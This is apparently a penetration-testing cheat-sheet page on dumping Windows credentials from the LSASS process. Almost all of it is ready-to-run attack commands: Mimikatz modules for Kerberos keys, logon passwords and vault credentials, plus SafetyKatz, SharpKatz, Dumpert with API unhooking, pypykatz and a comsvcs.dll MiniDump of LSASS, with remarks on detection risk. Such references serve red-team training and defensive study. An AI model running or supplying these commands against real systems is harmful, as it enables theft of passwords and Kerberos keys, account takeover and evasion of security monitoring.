Credentials Dumping

LSASS

high chances of detection

Kerberos encryption keys

The Kerberos SSP used by LSASS in order to provide different authentication methods. Therefore, it possible to dump Kerberos encryption keys using sekurlsa::ekeys.

# Dump credentials on a local machine using Mimikatz.
Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 

# Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz)
SafetyKatz.exe "sekurlsa::ekeys" 

# Dump credentials Using SharpKatz (C# port of some of Mimikatz functionality).
SharpKatz.exe --Command ekeys

# Dump credentials using Dumpert (Direct System Calls and API unhooking)
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

# Using pypykatz (Mimikatz functionality in Python)
pypykatz.exe live lsa

# Using comsvcs.dll
tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump
<lsass process ID> C:\Users\Public\lsass.dmp full

Logon Passwords

This usually shows recently logged on user and computer credentials.

Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'

Vault

Enumerates vault credentials of scheduled tasks.

Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'

Last updated 8 months ago

Was this helpful?